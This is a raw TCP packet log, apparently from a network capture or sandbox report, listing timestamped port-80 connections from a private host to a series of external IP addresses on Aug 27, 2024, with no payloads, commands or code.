                                        Aug 27, 2024 08:43:45.971091032 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.975912094 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:45.976027012 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.987236977 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.992156982 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567090034 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567107916 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567143917 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567163944 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567177057 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567181110 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.567188978 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567203045 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567215919 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567228079 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.567233086 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567243099 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567261934 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.567282915 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.572103024 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572115898 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572129965 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572143078 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572161913 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.572200060 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.653692961 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653721094 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653736115 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653780937 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653780937 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.653836012 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:47.499074936 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.518515110 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.523443937 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:48.523523092 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.539870024 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.544831991 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:48.544842958 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164372921 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164386034 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164406061 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164423943 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164437056 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164447069 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.164449930 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164463043 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164474964 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164496899 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164499998 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.164511919 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164535046 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.164556980 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.169431925 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169524908 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169537067 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169590950 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169698000 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.175542116 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.251149893 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251166105 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251190901 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251235962 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251384974 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.251384974 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.251445055 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251923084 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:50.049518108 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.064801931 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.069737911 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.069852114 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.077570915 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.082361937 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707773924 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707797050 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707809925 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707822084 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707838058 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707850933 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707863092 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707875967 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707890987 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707987070 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.708014965 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.708014965 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.708103895 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.713010073 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713023901 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713037014 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713051081 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713205099 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.713205099 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.798999071 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799017906 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799031019 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799038887 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799257994 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.801855087 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.806631088 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:56.994050026 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:56.998920918 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:56.999008894 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:57.018524885 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:57.023336887 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:57.478491068 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:57.481759071 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:58.530389071 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:58.536541939 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:59.549669981 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:59.554609060 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:59.557327986 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:59.567925930 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:59.572712898 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:00.019970894 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:00.020291090 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:01.077394962 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:01.082416058 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.095964909 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:02.101058960 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.103971004 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:02.115555048 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:02.120395899 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.120537996 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.569612980 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.569669008 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:03.624248028 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:03.629168034 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:04.643311977 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:04.648122072 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:04.648186922 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:04.656879902 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:04.661648989 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:05.125711918 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:05.125731945 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:05.125859022 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:05.129309893 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:05.134072065 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:10.204369068 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:10.209234953 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:10.209773064 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:10.221165895 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:10.226288080 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:10.668118000 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:10.668171883 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:11.733644962 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:11.738523006 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:12.752933979 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:12.759828091 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:12.759907007 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:12.775671959 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:12.780610085 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:13.238626957 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:13.244664907 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:14.281641006 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:14.286813021 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.299074888 CEST5123680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:15.305619001 CEST805123684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.309842110 CEST5123680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:15.319899082 CEST5123680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:15.325042963 CEST805123684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.325057030 CEST805123684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.775507927 CEST805123684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.775623083 CEST5123680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:16.827312946 CEST5123680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:16.832266092 CEST805123684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:17.848553896 CEST5123780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:17.853682041 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:17.857662916 CEST5123780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:17.869556904 CEST5123780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:17.874486923 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.319936991 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.319955111 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.319967985 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.319979906 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.319993973 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320004940 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320015907 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320030928 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320044994 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320054054 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320065022 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:18.320147991 CEST5123780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:18.320198059 CEST5123780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:18.325205088 CEST5123780192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:18.330061913 CEST805123784.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:23.499382019 CEST5123980192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:23.504211903 CEST8051239199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:23.507590055 CEST5123980192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:23.516582012 CEST5123980192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:23.521363974 CEST8051239199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:23.968303919 CEST8051239199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:23.968770981 CEST8051239199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:23.968785048 CEST8051239199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:23.968939066 CEST5123980192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:25.030527115 CEST5123980192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:26.048883915 CEST5124080192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:26.053829908 CEST8051240199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:26.057104111 CEST5124080192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:26.068656921 CEST5124080192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:26.073767900 CEST8051240199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:26.541621923 CEST8051240199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:26.541640043 CEST8051240199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:26.541690111 CEST5124080192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:26.541712999 CEST8051240199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:26.541752100 CEST5124080192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:27.577212095 CEST5124080192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:28.597203016 CEST5124180192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:28.602168083 CEST8051241199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:28.602238894 CEST5124180192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:28.616971016 CEST5124180192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:28.621778011 CEST8051241199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:28.621922970 CEST8051241199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:29.065371037 CEST8051241199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:29.065395117 CEST8051241199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:29.065409899 CEST8051241199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:29.065495968 CEST5124180192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:29.065552950 CEST5124180192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:30.124286890 CEST5124180192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:31.142816067 CEST5124280192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:31.147754908 CEST8051242199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:31.147874117 CEST5124280192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:31.154472113 CEST5124280192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:31.159236908 CEST8051242199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:31.610946894 CEST8051242199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:31.611026049 CEST8051242199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:31.611035109 CEST8051242199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:31.613794088 CEST5124280192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:31.617554903 CEST5124280192.168.2.6199.59.243.226
                                        Aug 27, 2024 08:44:31.622419119 CEST8051242199.59.243.226192.168.2.6
                                        Aug 27, 2024 08:44:37.571860075 CEST5124380192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:37.576706886 CEST8051243157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:37.584539890 CEST5124380192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:37.594671965 CEST5124380192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:37.599503040 CEST8051243157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:38.435836077 CEST8051243157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:38.435854912 CEST8051243157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:38.435900927 CEST5124380192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:39.108556032 CEST5124380192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:40.128582001 CEST5124480192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:40.133474112 CEST8051244157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:40.135669947 CEST5124480192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:40.147605896 CEST5124480192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:40.152442932 CEST8051244157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:40.939760923 CEST8051244157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:40.939783096 CEST8051244157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:40.939929008 CEST5124480192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:41.655570984 CEST5124480192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:42.676851034 CEST5124580192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:42.681818008 CEST8051245157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:42.681907892 CEST5124580192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:42.697398901 CEST5124580192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:42.702406883 CEST8051245157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:42.702431917 CEST8051245157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:43.475512981 CEST8051245157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:43.475686073 CEST8051245157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:43.481585026 CEST5124580192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:44.202260017 CEST5124580192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:45.220808983 CEST5124680192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:45.225670099 CEST8051246157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:45.225810051 CEST5124680192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:45.232322931 CEST5124680192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:45.237509012 CEST8051246157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:46.077529907 CEST8051246157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:46.077552080 CEST8051246157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:46.077883959 CEST5124680192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:46.080581903 CEST5124680192.168.2.6157.7.44.213
                                        Aug 27, 2024 08:44:46.085442066 CEST8051246157.7.44.213192.168.2.6
                                        Aug 27, 2024 08:44:51.584243059 CEST5124780192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:51.589073896 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:51.589652061 CEST5124780192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:51.600059032 CEST5124780192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:51.604938984 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:52.158901930 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:52.158921003 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:52.158934116 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:52.158946037 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:52.158957958 CEST8051247162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:52.159002066 CEST5124780192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:52.159090996 CEST5124780192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:53.108599901 CEST5124780192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:54.127173901 CEST5124880192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:54.132251978 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.135766983 CEST5124880192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:54.147631884 CEST5124880192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:54.152522087 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.707762957 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.707789898 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.707803011 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.707851887 CEST5124880192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:54.707962990 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.707976103 CEST8051248162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:54.708023071 CEST5124880192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:55.655477047 CEST5124880192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:56.674874067 CEST5124980192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:56.679768085 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:56.679841995 CEST5124980192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:56.692435026 CEST5124980192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:56.697372913 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:56.697488070 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:57.244752884 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:57.244767904 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:57.244780064 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:57.244805098 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:57.244816065 CEST8051249162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:57.244827032 CEST5124980192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:57.244893074 CEST5124980192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:58.205589056 CEST5124980192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.221600056 CEST5125080192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.226417065 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.226485968 CEST5125080192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.234587908 CEST5125080192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.239470005 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.820873976 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.820893049 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.820913076 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.820925951 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.820945024 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:44:59.821052074 CEST5125080192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.821052074 CEST5125080192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.823550940 CEST5125080192.168.2.6162.240.81.18
                                        Aug 27, 2024 08:44:59.828403950 CEST8051250162.240.81.18192.168.2.6
                                        Aug 27, 2024 08:45:04.848895073 CEST5125180192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:04.853785992 CEST8051251172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:04.853897095 CEST5125180192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:04.863579988 CEST5125180192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:04.868411064 CEST8051251172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:06.261434078 CEST8051251172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:06.261450052 CEST8051251172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:06.261460066 CEST8051251172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:06.261471987 CEST8051251172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:06.261507034 CEST5125180192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:06.261550903 CEST5125180192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:06.374627113 CEST5125180192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:07.393598080 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:07.398746967 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:07.401654959 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:07.410522938 CEST5125280192.168.2.6172.67.220.161
                                        Aug 27, 2024 08:45:07.415411949 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.777610064 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.777626991 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.777637959 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.777650118 CEST8051252172.67.220.161192.168.2.6
                                        Aug 27, 2024 08:45:08.777694941 CEST5125280192.168.2.6172.67.220.161
